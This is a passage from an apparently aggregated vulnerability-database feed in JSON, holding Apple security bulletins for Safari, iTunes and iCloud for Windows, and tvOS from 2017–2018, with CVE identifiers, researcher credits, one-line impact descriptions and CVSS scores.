"https://support.apple.com/kb/HT208475", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:34", "description": "# About the security content of Safari 11.0.3\n\nThis document describes the security content of Safari 11.0.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.0.3\n\nReleased January 23, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.3\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\nCVE-2018-4147: found by OSS-Fuzz\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry updated October 18, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-23T00:00:00", "type": "apple", "title": "About the security content of Safari 11.0.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7830", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096", "CVE-2018-4147"], "modified": "2018-01-23T00:00:00", "id": "APPLE:CC30D14D06A0EF8E6C37B76F74D10838", "href": "https://support.apple.com/kb/HT208475", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:38", "description": "# About the security content of iTunes 12.7.2 for Windows\n\nThis document describes the security content of iTunes 12.7.2 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.2 for Windows\n\nReleased December 6, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**ICU**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later \n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.7.2 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-15422", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2017-12-06T00:00:00", "id": "APPLE:B3402276360A8C507F94E26E15D465F4", "href": "https://support.apple.com/kb/HT208326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:45", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.2 for Windows\n\nReleased December 6, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**ICU**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later \n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T05:09:28", "title": "About the security content of iTunes 12.7.2 for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-15422", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-10-18T05:09:28", "id": "APPLE:HT208326", "href": "https://support.apple.com/kb/HT208326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:19", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.3 for Windows\n\nReleased January 23, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T05:11:13", "title": "About the security content of iTunes 12.7.3 for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4147", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-7830"], "modified": "2018-10-18T05:11:13", "id": "APPLE:HT208474", "href": "https://support.apple.com/kb/HT208474", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:31", "description": "# About the security content of iCloud for Windows 7.3\n\nThis document describes the security content of iCloud for Windows 7.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.3\n\nReleased January 23, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-23T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 7.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7830", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4147"], "modified": "2018-01-23T00:00:00", "id": "APPLE:2732BFC5F6738F38C147C6168AF6954D", "href": "https://support.apple.com/kb/HT208473", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:42", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.3\n\nReleased January 23, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T04:39:34", "title": "About the security content of iCloud for Windows 7.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4147", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-7830"], "modified": "2018-10-18T04:39:34", "id": "APPLE:HT208473", "href": "https://support.apple.com/kb/HT208473", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:31", "description": "# About the security content of iTunes 12.7.3 for Windows\n\nThis document describes the security content of iTunes 12.7.3 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.3 for Windows\n\nReleased January 23, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4096: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4147: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry added October 18, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-23T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.7.3 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7830", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4147"], "modified": "2018-01-23T00:00:00", "id": "APPLE:4DD1430AA6C448DA22B8A78245462C2A", "href": "https://support.apple.com/kb/HT208474", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:43:22", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of 